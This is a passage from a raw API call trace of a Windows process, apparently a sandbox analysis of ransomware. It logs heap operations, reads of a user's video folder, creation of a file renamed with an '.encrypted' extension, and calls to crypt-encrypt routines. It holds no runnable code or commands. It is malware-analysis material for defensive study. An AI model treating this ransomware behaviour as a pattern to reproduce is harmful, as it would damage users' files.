(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0043.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0043.581] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw")) returned 0x10 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0043.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.582] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.encrypted.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\mb6 kn.encrypted.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0043.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0043.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0043.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0043.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.582] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0043.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0043.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0043.582] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0043.582] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0043.583] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0043.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0043.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0043.584] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0043.584] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x6c58, lpOverlapped=0x0) returned 1 [0043.586] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0043.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6c58) returned 0xac2018 [0043.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0043.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0043.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0043.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6c58) returned 0xac8c78 [0043.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.587] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6c58) returned 0xac2018 [0043.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0043.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.588] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0043.588] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.588] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0043.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0043.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6c58) returned 0xac2018 [0043.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0043.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0043.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0043.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c730 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6c58) returned 0xacf8d8 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0043.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0043.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0043.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0043.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0043.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.590] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0043.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0043.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da398 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0043.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc58 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0043.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.591] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0043.591] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0043.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0043.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0043.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0043.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0043.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0043.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0043.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.592] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 